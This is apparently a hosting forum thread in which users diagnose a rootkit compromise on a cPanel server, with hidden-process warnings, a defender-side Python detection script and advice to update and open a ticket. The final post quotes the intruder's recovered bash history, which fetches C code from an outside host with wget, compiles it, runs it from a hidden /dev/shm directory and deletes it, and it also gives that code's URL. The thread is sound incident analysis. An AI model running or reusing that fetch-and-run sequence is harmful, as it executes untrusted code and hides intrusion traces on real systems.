
Posted

I have been getting trojan horse warnings for the last few days. The message I get is:

 

Hidden Pid detected! [pid 21736]

hidden from ps: [yes]

binary location: [/usr/sbin/xntps]

 

When I do a manual scan for trojan horses through WHM, this is what I get:

 

Appears Clean

 

/dev/core

/dev/srd0

/dev/stderr

 

 

 

Scanning for Trojan Horses.....

.

.

 

Possible Trojan - /sbin/syslogd

Posted

Is this on a dedicated server? It sounds like you might possibly have had a rootkit installed on your server (that is you may have been hacked). Hidden from ps means that when you do a 'ps' command to list processes, that process doesn't show up. This is a common technique used by root kits... they'll either replace your ps binary, or load a kernel module (or both), to hide their processes and files. 'xntps' is a binary that is often used to install a backdoor.

 

If you see something like the following at the end of /etc/rc.d/rc.sysinit:

> # Xntps (NTPv3 daemon) startup..
> /usr/sbin/xntps -q

...then it is pretty definite you have been rooted.

 

Unless you really know what you are doing, you should send in a support ticket to have TCH staff take a look at your server. If your server is fully managed, they should take care of it. If not, they may take care of it for a charge. There's not really a magical "do this one thing" to get rid of a rootkit and whatever else they may have left behind, especially if they loaded a kernel module (you either need to remove, or negate that module before you can really find everything).

 

I'm gonna move this discussion to Security as well, as it's more relative.
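A defender-side check for the two symptoms described above, written as an added example (not code from this thread, nor from cPanel/WHM or chkrootkit): it lists PIDs that exist in /proc but are missing from `ps`, and flags a startup line for /usr/sbin/xntps in rc.sysinit. The rc.sysinit pattern assumes the exact line form quoted in the post, and the /proc comparison only helps when the rootkit trojaned `ps` rather than hiding the process from /proc via a kernel module.

```python
"""Spot a 'hidden from ps' PID and an xntps startup line (added example)."""
import os
import re
import subprocess

# Matches the startup line quoted in the thread: "/usr/sbin/xntps -q" (assumed form).
XNTPS_LINE = re.compile(r"^\s*/usr/sbin/xntps\b")


def hidden_pids(proc_pids, ps_pids):
    """PIDs present in /proc but absent from ps output: the 'hidden from ps' case."""
    return set(proc_pids) - set(ps_pids)


def pids_from_proc(proc_root="/proc"):
    """Every numeric directory under /proc is a live PID."""
    return {int(name) for name in os.listdir(proc_root) if name.isdigit()}


def pids_from_ps_output(text):
    """Parse `ps -e -o pid=` output (one PID per line) into a set of ints."""
    return {int(tok) for tok in text.split() if tok.isdigit()}


def pids_from_ps():
    out = subprocess.run(["ps", "-e", "-o", "pid="],
                         capture_output=True, text=True, check=True).stdout
    return pids_from_ps_output(out)


def binary_of(pid, proc_root="/proc"):
    """Resolve the running binary, like the 'binary location' in the warning."""
    try:
        return os.readlink(f"{proc_root}/{pid}/exe")
    except OSError:
        return "[unreadable]"


def xntps_startup_lines(rc_text):
    """1-based line numbers in rc.sysinit text that launch /usr/sbin/xntps."""
    return [n for n, line in enumerate(rc_text.splitlines(), 1) if XNTPS_LINE.match(line)]


if __name__ == "__main__":
    # Scan /proc before and after ps so a process that exits mid-check is not reported.
    before, ps_seen, after = pids_from_proc(), pids_from_ps(), pids_from_proc()
    for pid in sorted(hidden_pids(before & after, ps_seen)):
        print(f"Hidden Pid detected! [pid {pid}] binary location: [{binary_of(pid)}]")
    rc = "/etc/rc.d/rc.sysinit"  # path named in the thread
    if os.path.exists(rc):
        with open(rc) as fh:
            for n in xntps_startup_lines(fh.read()):
                print(f"{rc}:{n}: xntps startup line found")
```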

Posted

Oh, and btw, if you are managing your own server.... make sure you have updated your cPanel within the last two weeks, because that may be how you got rooted in the first place (if indeed you did) if you haven't updated it.

 

From a root shell, just run /scripts/upcp to make sure you are up to date.

Posted

Well - I spent a little time screwing around, and I think we've backtracked their steps. Once we changed ls to actually show us the truth (after they had changed it to lie), we backtracked their bash history, and lookee loo what we found...

 

> cd /dev/shm
> mkdir .t0rn
> cd .t0rn
> ls
> uname -a
> wget nu.gs/~dragnet/checkint.c
> make checkint.c
> make checkint
> ./checkint
> rm *checkint*
> exit

 

They left the script they used wget to grab on the webserver:

 

http://nu.gs/~dragnet/checkint.c

 

I think it's time to open that trouble ticket... lol
